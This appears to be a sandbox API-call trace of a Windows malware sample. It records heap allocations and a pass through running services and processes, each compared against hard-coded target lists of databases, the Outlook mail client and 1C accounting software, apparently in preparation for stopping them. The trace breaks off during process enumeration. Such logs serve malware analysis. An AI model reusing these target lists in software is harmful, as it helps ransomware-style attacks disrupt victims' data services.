	[0136.790] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b203c0, Size=0x80) returned 0x7b46650
	[0136.790] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b46650, Size=0x100) returned 0x7b452e0
	[0136.790] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7b58560
	[0136.790] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b58560, Size=0x20) returned 0x7b42e48
	[0136.790] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b42e48, Size=0x40) returned 0x7b203c0
	[0136.790] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b203c0, Size=0x80) returned 0x7b46650
	[0136.790] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b46650, Size=0x100) returned 0x7b58b70
	[0136.790] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc) returned 0x7b58560
	[0136.790] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x4) returned 0x7b69b20
	[0136.790] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7b585f0
	[0136.790] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b69b20, Size=0x8) returned 0x7b69b60
	[0136.790] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x14) returned 0x7b41da8
	[0136.790] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b69b60, Size=0x10) returned 0x7b585a8
	[0136.790] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x18) returned 0x7b41dc8
	[0136.790] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x1a) returned 0x7b42e48
	[0136.790] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b585a8, Size=0x20) returned 0x7b42e70
	[0136.790] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x1c) returned 0x7b42e98
	[0136.790] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x16) returned 0x7b41de8
	[0136.790] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x1a) returned 0x7b42ec0
	[0136.790] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc) returned 0x7b585a8
	[0136.790] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x4) returned 0x7b69b60
	[0136.790] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x40) returned 0x7b203c0
	[0136.790] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b69b60, Size=0x8) returned 0x7b69b20
	[0136.790] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x3c) returned 0x7b20408
	[0136.790] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b69b20, Size=0x10) returned 0x7b585c0
	[0136.791] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x14) returned 0x7b41e08
	[0136.791] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x18) returned 0x7b41e28
	[0136.791] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b585c0, Size=0x20) returned 0x7b42ee8
	[0136.791] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x24) returned 0x7b453e8
	[0136.791] lstrlenW (lpString="1c8.exe;1cv77.exe;outlook.exe;postgres.exe;mysqld-nt.exe;mysqld.exe;sqlservr.exe;") returned 81
	[0136.791] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b452e0 | out: hHeap=0x7ab0000) returned 1
	[0136.791] lstrlenW (lpString="FirebirdGuardianDefaultInstance;FirebirdServerDefaultInstance;sqlwriter;mssqlserver;sqlserveradhelper;") returned 102
	[0136.791] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b58b70 | out: hHeap=0x7ab0000) returned 1
	[0136.791] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x7b43050
	[0136.825] EnumServicesStatusExW (in: hSCManager=0x7b43050, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 0
	[0136.825] GetLastError () returned 0xea
	[0136.825] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc9a) returned 0x7baebb0
	[0136.825] EnumServicesStatusExW (in: hSCManager=0x7b43050, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x7baebb0, cbBufSize=0xc9a, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x7baebb0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 1
	[0136.825] CloseServiceHandle (hSCObject=0x7b43050) returned 1
	[0136.825] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0136.825] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0136.825] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0136.825] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0136.826] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0136.826] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0136.826] lstrlenW (lpString="AudioSrv") returned 8
	[0136.826] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0136.826] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0136.826] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0136.826] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0136.826] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0136.826] lstrlenW (lpString="BFE") returned 3
	[0136.826] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0136.826] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0136.826] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0136.826] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0136.826] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0136.826] lstrlenW (lpString="CryptSvc") returned 8
	[0136.826] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0136.826] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0136.826] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0136.826] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0136.826] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0136.826] lstrlenW (lpString="CscService") returned 10
	[0136.826] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0136.826] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0136.826] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0136.826] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0136.826] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0136.826] lstrlenW (lpString="DcomLaunch") returned 10
	[0136.826] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0136.826] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0136.826] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0136.826] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0136.826] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0136.826] lstrlenW (lpString="Dhcp") returned 4
	[0136.826] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0136.827] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0136.827] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0136.827] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0136.827] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0136.827] lstrlenW (lpString="Dnscache") returned 8
	[0136.827] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0136.827] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0136.827] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0136.827] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0136.827] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0136.827] lstrlenW (lpString="DPS") returned 3
	[0136.827] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0136.827] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0136.827] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0136.827] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0136.827] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0136.827] lstrlenW (lpString="eventlog") returned 8
	[0136.827] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0136.827] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0136.827] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0136.827] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0136.827] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0136.827] lstrlenW (lpString="EventSystem") returned 11
	[0136.827] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0136.827] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0136.827] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0136.827] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0136.827] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0136.827] lstrlenW (lpString="gpsvc") returned 5
	[0136.827] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0136.827] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0136.827] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0136.827] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0136.827] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0136.827] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0136.828] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0136.828] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0136.828] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0136.828] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0136.828] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0136.828] lstrlenW (lpString="lmhosts") returned 7
	[0136.828] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0136.828] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0136.828] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0136.828] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0136.828] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0136.828] lstrlenW (lpString="MMCSS") returned 5
	[0136.828] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0136.828] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0136.828] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0136.828] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0136.828] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0136.828] lstrlenW (lpString="MpsSvc") returned 6
	[0136.828] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0136.828] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0136.828] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0136.828] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0136.828] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0136.828] lstrlenW (lpString="NlaSvc") returned 6
	[0136.828] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0136.828] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0136.828] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0136.828] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0136.828] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0136.828] lstrlenW (lpString="nsi") returned 3
	[0136.828] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0136.828] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0136.828] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0136.828] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0136.829] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0136.829] lstrlenW (lpString="PcaSvc") returned 6
	[0136.829] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0136.829] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0136.829] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0136.829] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0136.829] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0136.829] lstrlenW (lpString="PlugPlay") returned 8
	[0136.829] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0136.829] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0136.829] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0136.829] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0136.829] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0136.829] lstrlenW (lpString="Power") returned 5
	[0136.829] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0136.829] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0136.829] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0136.829] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0136.829] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0136.829] lstrlenW (lpString="ProfSvc") returned 7
	[0136.829] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0136.829] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0136.829] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0136.829] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0136.829] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0136.829] lstrlenW (lpString="RpcEptMapper") returned 12
	[0136.829] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0136.829] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0136.829] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0136.829] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0136.829] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0136.829] lstrlenW (lpString="RpcSs") returned 5
	[0136.829] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0136.829] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0136.830] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0136.830] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0136.830] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0136.830] lstrlenW (lpString="SamSs") returned 5
	[0136.830] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0136.830] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0136.830] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0136.830] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0136.830] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0136.830] lstrlenW (lpString="Schedule") returned 8
	[0136.830] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0136.830] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0136.830] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0136.830] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0136.830] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0136.830] lstrlenW (lpString="SENS") returned 4
	[0136.830] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0136.830] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0136.830] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0136.830] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0136.830] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0136.830] lstrlenW (lpString="ShellHWDetection") returned 16
	[0136.830] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0136.830] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0136.830] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0136.830] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0136.830] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0136.830] lstrlenW (lpString="Spooler") returned 7
	[0136.830] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0136.830] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0136.830] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0136.830] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0136.831] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0136.831] lstrlenW (lpString="Themes") returned 6
	[0136.831] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0136.831] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0136.831] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0136.831] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0136.831] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0136.831] lstrlenW (lpString="UxSms") returned 5
	[0136.831] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0136.831] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0136.831] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0136.831] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0136.831] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0136.831] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7baebb0 | out: hHeap=0x7ab0000) returned 1
	[0136.831] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x130
	[0136.832] Process32FirstW (in: hSnapshot=0x130, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0136.833] Process32NextW (in: hSnapshot=0x130, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0136.833] lstrlenW (lpString="System") returned 6
	[0136.833] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0136.833] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0136.833] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0136.833] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0136.833] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0136.833] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0136.833] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0136.833] Process32NextW (in: hSnapshot=0x130, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0136.833] lstrlenW (lpString="smss.exe") returned 8
	[0136.833] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0136.834] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0136.834] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0136.834] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0136.834] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0136.834] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0136.834] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0136.834] Process32NextW (in: hSnapshot=0x130, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0136.834] lstrlenW (lpString="csrss.exe") returned 9
	[0136.834] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0136.834] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0136.834] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0136.834] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0136.834] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0136.834] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0136.834] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0136.834] Process32NextW (in: hSnapshot=0x130, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0136.834] lstrlenW (lpString="wininit.exe") returned 11
	[0136.835] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0136.835] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0136.835] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0136.835] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0136.835] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0136.835] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0136.835] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0136.835] Process32NextW (in: hSnapshot=0x130, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0136.835] lstrlenW (lpString="csrss.exe") returned 9
	[0136.835] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0136.835] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0136.835] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0136.835] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0136.835] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0136.835] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0136.835] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0136.835] Process32NextW (in: hSnapshot=0x130, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0136.836] lstrlenW (lpString="winlogon.exe") returned 12
	[0136.836] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1
	[0136.836] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1
	[0136.836] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1
	[0136.836] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1
	[0136.836] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1
	[0136.836] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1
	[0136.836] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1
	[0136.836] Process32NextW (in: hSnapshot=0x130, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0136.836] lstrlenW (lpString="services.exe") returned 12
	[0136.836] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1
	[0136.836] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1
	[0136.836] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1
	[0136.836] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1
